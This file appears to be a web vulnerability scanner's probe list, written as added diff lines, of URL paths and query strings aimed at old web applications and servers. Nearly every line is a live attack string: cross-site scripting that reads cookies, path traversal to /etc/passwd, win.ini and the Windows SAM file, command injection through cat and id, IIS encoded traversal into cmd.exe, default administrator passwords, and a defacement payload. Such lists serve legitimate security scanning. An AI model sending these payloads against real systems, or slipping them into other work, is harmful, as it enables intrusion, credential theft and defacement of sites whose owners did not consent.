+theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session 
+theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
+search.asp?Search=
+forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+_vti_bin/
+NULL.printer
+nul..cfm
+nul..dbm
+nul.cfm
+nul.dbm
+cgi-bin/imagemap
+cgi-bin/imagemap.exe
+cgi-bin/htimage.exe/path/filename?2,2
+cgi-bin/htimage.exe
+mlog.html
+mlog.phtml
+mylog.html?screen=/etc/passwd
+mylog.phtml?screen=/etc/passwd
+php/mlog.html
+php/mlog.phtml
+php/mylog.html?screen=/etc/passwd
+php/mylog.phtml?screen=/etc/passwd
+i?/etc/passwd
+cfide/administrator/index.cfm
+CFIDE/administrator/index.cfm
+cfide/administrator/index.cfm
+CFIDE/administrator/index.cfm
+directory.php?dir=%3Bcat%20/etc/passwd
+content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
+content/base/build/explorer/none.php?/etc/passwd
+soapConfig.xml
+cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+GW5/GWWEB.EXE?HELP=bad-request
+GWWEB.EXE?HELP=bad-request
+cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
+cgi-bin/GWWEB.EXE?HELP=bad-request
+examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
+XSQLConfig.xml
+sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
+docs/<script>alert('Vulnerable');</script>
+docs/NED?action=retrieve&location=.
+aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>
+lcgi/ndsobj.nlm
+surf/scwebusers
+_vti_bin/fpcount.exe
+_private/form_results.htm
+_private/form_results.html
+_private/form_results.txt
+scripts/tools/getdrvrs.exe
+cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
+cgi-bin/vote.cgi
+cgi-bin/quizme.cgi
+/
+shop/normal_html.cgi?file=../../../../../../etc/issue%00
+shop/normal_html.cgi?file=;cat%20/etc/passwd|
+shop/normal_html.cgi?file=|cat%20/etc/passwd|
+shop/member_html.cgi?file=;cat%20/etc/passwd|
+shop/member_html.cgi?file=|cat%20/etc/passwd|
+cgi-bin/sendform.cgi
+boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/
+proxy/ssllogin?user=administrator&password=administrator
+proxy/ssllogin?user=administrator&password=operator
+proxy/ssllogin?user=administrator&password=user
+cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+project/index.php?m=projects&user_cookie=1
+webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
+webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
+active.log
+?pattern=/etc/*&sort=name
+images/?pattern=/etc/*&sort=name
+debug/dbg?host==<script>alert('Vulnerable');</script>
+debug/echo?name=<script>alert('Vulnerable');</script>
+debug/errorInfo?title===<script>alert('Vulnerable');</script>
+debug/showproc?proc===<script>alert('Vulnerable');</script>
+site/eg/source.asp
+PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00
+~nobody/etc/passwd
+admin/db.php
+admin/db.php?dump_sql=1
+dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+%00/
+iissamples/exair/search/advsearch.asp
+isqlplus
+data/member_log.txt
+data/userlog/log.txt
+userlog.php
+internal.sws?../../../../../../../../winnt/win.ini
+internal.sws?../../../../../../../../winnt/win.ini
+internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
+internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini
+ASP/cart/database/metacart.mdb
+database/metacart.mdb
+mcartfree/database/metacart.mdb
+metacart/database/metacart.mdb
+shop/database/metacart.mdb
+shoponline/fpdb/shop.mdb
+shopping/database/metacart.mdb
+search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>
+admin/phpinfo.php
+start.php?config=alper.inc.php
+login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang
+viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1
+cgi-bin/gettransbitmap
+cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
+JUNK(5).xml
+JUNK(5)/
+cgi-bin/main_menu.pl
+ban.bak
+ban.dat
+ban.log
+banmat.pwd
+admin/adminproc.asp
+admin/datasource.asp
+utils/sprc.asp
+reports/temp/
+cgi-bin/rtm.log
+cgi-bin/VsSetCookie.exe?
+addressbook.php?\"><script>alert(Vulnerable)</script><!--
+options.php?optpage=<script>alert('Vulnerable!')</script>
+search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
+help.php?chapter=<script>alert('Vulnerable')</script>
+src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
+cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/Webnews.exe
+cgi-bin/webnews.pl
+.../.../.../
+cgi-bin/texis.exe/junk
+cgi-bin/texis/junk
+texis.exe/?-dump
+texis.exe/?-version
+cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>
+acart2_0/error.asp?msg=<script>alert(\"test\")</script>
+acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>
+acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>
+cgi-bin/sensepost.exe?/c+dir
+certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir
+cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir
+msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
+scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
+_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
+acart2_0/acart2_0.mdb
+acart2_0/admin/category.asp
+Sites/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
+Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
+Sites/Samples/Knowledge/Push/ViewCode.asp
+Sites/Samples/Knowledge/Search/ViewCode.asp
+SiteServer/Publishing/ViewCode.asp
+siteserver/publishing/viewcode.asp?source=/default.asp
+shoutbox.php?conf=../../../../../../../etc/passwd
+securelogin/1,2345,A,00.html
+.%252e/.%252e/.%252e/winnt/boot.ini
+add.php
+class/mysql.class
+inc/sendmail.inc
+admin/system.php3?cmd=cat%20/etc/passwd
+admin/system.php3?cmd=dir%20c:\
+admin/exec.php3?cmd=cat%20/etc/passwd
+admin/exec.php3?cmd=dir%20c:\
+foo.php3
+config.inc
+cgi-bin/environ.pl
+cgi-bin/testcgi.exe
+sysuser/docmgr/ieedit.stm?url=../
+sysuser/docmgr/iecreate.stm?template=../
+wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>
+sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
+sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
+sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
+cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
+cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
+syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
+syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
+syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
+syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
+syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
+netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>
+netutils/findata.stm?host=<script>alert(document.cookie)</script>
+netutils/findata.stm?user=<script>alert(document.cookie)</script>
+sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
+isapi/tstisapi.dll
+cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+NUKEbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
+lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf
+cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
+cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
+catinfo
+soap/servlet/soaprouter
+opendir.php?/etc/passwd
+opendir.php?requesturl=/etc/passwd
+webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
+webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+JUNK(223)<font%20size=50>DEFACED<!--//--
+MWS/HandleSearch.html?searchTarget=test&B1=Submit
+cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
+certsrv/..%255cwinnt/system32/cmd.exe?/c+dir
+cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
+_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+server-info
+cgi-bin/namazu.cgi
+oekaki/
+.nsconfig
+cgi-bin/.nsconfig
+?D=A
+?N=D
+?S=A
+?M=A
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1
+cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1
+dc/auth_data/auth_user_file.txt
+dc/orders/orders.txt
+dcshop/auth_data/auth_user_file.txt
+dcshop/orders/orders.txt
+cgi-bin/shop.pl/page=;cat%20shop.pl|
+cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+.FBCIndex
+cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
+cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
+JUNK(223)<font%20size=50><script>alert('Vulnerable')</script><!--//--
+cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
+cgi-bin/ion-p?page=../../../../../etc/passwd
+..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
+..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
+cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
+applist.asp
+launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica
+_layouts/alllibs.htm
+_layouts/settings.htm
+_layouts/userinfo.htm
+cgi-bin/index.pl
+.DS_Store
+cgi-bin/rwcgi60
+cgi-bin/rwcgi60/showenv
+cgi-bin/index.pl
+cgi-bin/index.pl
+cgi-bin/classifieds/classifieds.cgi
+cgi-bin/calendar/index.cgi
+stronghold-info
+stronghold-status
+blah-whatever.jsp
+gallery/index.php?include=../../../../../../../../../etc/passwd
+modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd
+cgi-bin/../../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+phprocketaddin/?page=../../../../../../../../../../etc/passwd
+cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
+iissamples/exair/howitworks/Code.asp
+iissamples/exair/howitworks/Codebrw1.asp
+msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini
+pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>
+pls/help/<script>alert('Vulnerable')</script>
+demo/ojspext/events/globals.jsa
+globals.jsa
+pls/sample/admin_/help/..%255cplsql.conf
+servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
+..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
+..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
+..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
+..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
+..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
+..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
+..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
+..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
+..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
+ans.pl?p=../../../../../usr/bin/id|&blah
+ans/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
+?\"><script>alert('Vulnerable');</script>
+JUNK(10)abcd.html
+iissamples/exair/howitworks/codebrws.asp
+servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
+servlet/com.newatlanta.servletexec.JSP10Servlet/
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
+iissamples/sdk/asp/docs/codebrws.asp
+iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
+iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
+pass_done.php
+admin/admin.php?adminpy=1
+iishelp/iis/htm/tutorial/redirect.asp
+servlet/SnoopServlet
+Citrix/PNAgent/
+Citrix/ICAWEB/
+IBMWebAS/
+IBMWebAS/docs/
+IBMWebAS/apidocs/
+IBMWebAS/configDocs/
+IBMWebAS/mbeanDocs/
+iishelp/iis/misc/default.asp
+Citrix/MetaFrameXP/default/login.asp
+manager/html-manager-howto.html
+manager/manager-howto.html
+includes/adovbs.inc
+adovbs.inc
+fcgi-bin/echo
+fcgi-bin/echo2
+pls/ldc/admin_/
+demo/basic/simple/viewsrc/welcomeuser.jsp.txt
+README
+demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
+soapdocs/webapps/soap/
+soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
+shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
+phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>
+phpinfo.php?cx[]=JUNK(4096)<script>alert(foo)</script>
+j2ee/
+cgi-bin/printenv.tmp
+perl/printenv
+perl-status
+WebCacheDemo.html
+webcache/
+webcache/webcache.xml
+bmp/
+bmp/global-web-application.xml
+bmp/JSPClient.java
+bmp/mime.types
+bmp/README.txt
+bmp/sqljdemo.jsp
+bmp/setconn.jsp
+ptg_upgrade_pkg.log
+OA_HTML/oam/weboam.log
+webapp/admin/_pages/_bc4jadmin/
+_pages/_webapp/_admin/_showpooldetails.java
+_pages/_webapp/_admin/_showjavartdetails.java
+_pages/_demo/
+_pages/_webapp/_jsp/
+_pages/_demo/_sql/
+/OA_HTML/_pages/
+OA_HTML/webtools/doc/index.html
+reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
+apex/
+OA_JAVA/
+OA_HTML/
+aplogon.html
+appdet.html
+servlets/weboam/oam/oamLogin
+OA_HTML/PTB/mwa_readme.htm
+reports/rwservlet
+reports/rwservlet/showenv
+reports/rwservlet/showmap
+reports/rwservlet/showjobs
+reports/rwservlet/getjobid7?server=myrep
+reports/rwservlet/getjobid4?server=myrep
+reports/rwservlet/showmap?server=myserver
+pls/portal/owa_util.cellsprint?p_theQuery=select
+pls/portal/owa_util.listprint?p_theQuery=select
+pls/portal/owa_util.show_query_columns?ctable=sys.dba_users
+pls/portal/owa_util.showsource?cname=owa_util
+pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users
+pls/portal/owa_util.signature
+pls/portal/HTP.PRINT
+pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT
+pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
+pls/portal/PORTAL.wwv_form.genpopuplist
+pls/portal/PORTAL.wwv_ui_lovf.show
+pls/portal/PORTAL.wwa_app_module.link
+pls/portal/PORTAL.wwv_dynxml_generator.show
+pls/portal/PORTAL.home
+pls/portal/PORTAL.wwv_setting.render_css
+pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO
+pls/portal/SELECT
+pls/portal/null
+OA_MEDIA/
+OA_HTML/META-INF/
+OA_HTML/jsp/por/services/login.jsp
+OA_HTML/PTB/ICXINDEXBASECASE.htm
+OA_HTML/PTB/ECXOTAPing.htm
+OA_HTML/PTB/xml_sample1.htm
+OA_HTML/jsp/wf/WFReassign.jsp
+OA_JAVA/Oracle/
+OA_JAVA/servlet.zip
+OA_JAVA/oracle/forms/registry/Registry.dat
+OA_HTML/oam/
+OA_HTML/jsp/
+OA_HTML/jsp/fnd/fndversion.jsp
+OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc
+OA_HTML/jsp/fnd/fndhelputil.jsp
+install/install.php
+_vti_bin/shtml.dll/_vti_rpc
+cehttp/trace
+cehttp/property/
+webdav/index.html
+hp-ux/
+hp_docs/
+hp_docs/cgi-bin/index.cgi
+hp_docs/xmltools/
+cgi-bin/showuser.cgi
+cgi-bin/man2html
+status?full=true
+rpc.php?q="><script>alert(document.cookie)</script>
+db.php?q='&t='
+rpc.php?q='&t=' |